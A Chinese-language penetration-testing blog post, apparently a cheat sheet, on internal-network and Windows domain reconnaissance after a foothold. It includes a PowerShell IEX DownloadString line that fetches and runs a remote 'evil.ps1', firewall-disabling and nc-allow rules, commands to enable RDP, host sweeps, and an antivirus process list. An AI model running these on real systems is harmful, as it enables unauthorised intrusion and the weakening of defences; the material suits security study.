Posted Updated Penetration11 minutes read (About 1608 words)

简易内网信息收集

内网信息收集

辅助命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// 隐藏窗口
-W Hidden
-WindowStyle Hidden

//非交互模式,不为用户提供交互提示
-NonI
-NonInteractive

//使用IEX(Invoke-Expression)进行远程脚本下载
-IEX(New-ObjectNet.WebClient).DownloadString("127.0.0.1/evil.ps1") 

//不加载当前用户的配置文件
-NoP
-NoProfile

//显示logo的启动
-NoLogo

//执行后不退出shell,常用于键盘记录等
-noexit

宗旨

进入内网的“黑暗森林”后,需要有个大致的判断:

  1. 我是谁(whoami 等)
  2. 这个机子都有谁,有[[域]]吗,域的账户都有啥(重点关注 3 本地组管理员与全局组管理员),域控的 ip 域机器名是啥
  3. 本机信息收集
  4. 我的域有其他存活的机子吗,都开放了什么端口
  5. 确定域管理员、本地管理员都有谁,登录本台机器的都有谁(有没有域管理员)
  6. 当前域控下的活动域都有哪些

杂余命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
//查看当前权限
whoami
whoami /all //可以获取域SID

//查看完整IP信息
ipconfig /all

//查看系统信息
systeminfo
systeminfo | findstr /b /c:"OS"
echo %PROCESSOR_ARCHITECTURE% //或者%PATH%啥的,反正是环境变量

//查询端口列表
netstat -ano

//查看计划任务
schtasks /query /fo LIST /v

//使用telnet逐一验证高危端口是否开启
telnet DC 22
telnet DC 1443
telnet 1.2.3.4 3389

//查询路由表
route print

//查询所有可用接口的ARP缓存表
arp -a

//查看域控的机器名
nltest /DCLIST:hacke

//查看域控的主机名
nslookup -type=SRV _ldap._tcp

//查看代理配置情况
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

//查询远程连接端口(0xd3d就是3389)
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /V PortNumber

//在Windows Server 2003中开启3389
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowsconnections 1

//在Windows Server 2008和Windows Ser ver 2012中开启3389(以下三选一)
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName="RDP-Tcp") call setuserauthenticationrequired 1

reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

//判断当前域控下活动域都有哪些
//将域控机器名放在dcs.txt中,域管理员放到admins.txt中
FOR /F %I in (dcs.txt) do @echo [+] Querying DC %I && @netsess -h %I 2>nul >sessions.txt && FOR /F %a in (admins.txt) DO @type sessions.txt | findstr /I %a

//通过ping的ICMP协议进行主机探测
for /L %I in (1,1,254) DO @ping  -w 1 -n 1 192.168.1.%I | findstr "TTL="

net 命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
//查看域里的各种基本信息
//加domain就是域内操作,会直接将命令放到域控上执行
net group /domain
net user /domain
net group "domain admins" /domain //可以在后面加身份来具体查询
net localgroup  //本地组 

//在域内机器上net group /domain 等同于在域控上 net group
//如果在本地组里是administrators里边的,及是本地的系统管理员
//如果全局组中是domain users 既是普通域用户,如果在全局组中的domain admins 组里边,那么不光是域管理员还是域内所有机器的管理员(即会自动加入到域内机器的 administrtors 组里边)

身份如下:
Domain Admins //域管理员(完全控制权限)
Domain Computers //域内机器
Domain Controllers //域控制器
Domain Guest //域访客,权限较低
Domain Users //域用户
Enterprise Admins //企业系统管理员用户(完全控制权限)

//查看当前计算机信息以及是否在域下面
net config workstation

//查看域控服务器
net time /domain

//查看域密码策略信息
net accounts /domain

//查询域
net view

//查询域内所有计算机
//dev有可能是开发服务器,web、app有可能是Web服务器,NAS可能是存储服务器,fileserver可能是文件服务器
net view /domain:HACKE

//查看主机开机时间
net statistics workstation

//列出或断开本地计算机与所连接客户端的对话
net session

//查询本机共享列表
net share

netsh-防火墙相关

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//关闭防火墙
netsh firewall set opmode disable //Windows Server 2003之前版本
netsh advfirewall set allprofiles state off //Windows Server 2003之后版本

//查看防火墙配置
netsh firewall show config

//允许指定程序进入(Windows Server 2003之前版本)
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable 

//允许指定程序进入
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow 

//允许指定程序退出
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow

//允许某端口放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

//自定义防火墙日志的存储位置
netsh advfirewall set currentprofile logging filename "C:\windows\"

wmic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
//获取安装的软件、版本信息
wmic product get name,version

//查询本机的服务信息
wmic service list brief

//查看启动程序的信息
wmic startup get command,caption

//查看安装在系统中的补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn

//查询本机共享列表
wmic share get name,path,status

//查看域内用户详细信息
wmic useraccount get /all

ds 命令

ds 命令只能在 windows 服务器版本下才能运行

1
2
//查看存在的用户
dsquery user

tasklist

  • 常见杀毒软件进程名称
进程名 软件名
360sd.exe 360 杀毒
360tray.exe 360 实时防护
ZhuDongFangYu.exe 360 主动防御
KSafeTray.exe 金山卫士
SafeDogUpdateCenter.exe 服务器安全狗
McAfee McShield.exe McAfee
egui.exe NOD32
AVP.EXE 卡巴斯基
avguard.exe 小红伞
bdagent.exe BitDefender

adfind.exe

使用 adfind.exe

nbtscan.exe

使用 nbtscan.exe 进行域内存活主机的探测

行末的提示对照表

Token 含义
SHARING 该机器中存在正在运行的文件和打印共享服务,但不一定有内容共享
DC 该机器可能是域控制器
U=USER 该机器中有登录名为 User 的用户
IIS 该机器可能安装了 IIS 服务器
EXCHANGE 该机器可能安装了 Exchange
NOTES 该机器可能安装了 Lotus Notes 电子邮件客户端
? 没有识别出该机器的 NetBIOS 资源(可以使用-F 选项再次扫描)

[[Metasploit]]

使用 TCP 模块进行端口扫描

1
2
3
4
5
6
7
search portscan
use auxiliary/scanner/portscan/tcp //或者使用其他端口扫描软件

set RHOSTS 1.2.3.4
set ports 1-4000
set THREADS 10
run

[[powershell]]框架

  • nishang

  • powersploit

简易内网信息收集

https://resek4.github.io/2021/06/11/内网信息收集/

Author

Resek4

Posted on

2021-06-11

Updated on

2023-01-27

Licensed under

Comments

Follow

Archives

Categories

Recents

×